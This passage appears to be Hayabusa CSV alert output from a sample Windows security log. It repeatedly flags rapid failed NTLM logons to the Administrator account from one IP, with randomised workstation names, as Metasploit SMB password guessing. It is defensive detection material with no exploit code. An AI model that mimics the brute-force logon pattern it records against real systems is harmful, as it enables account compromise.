SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: 
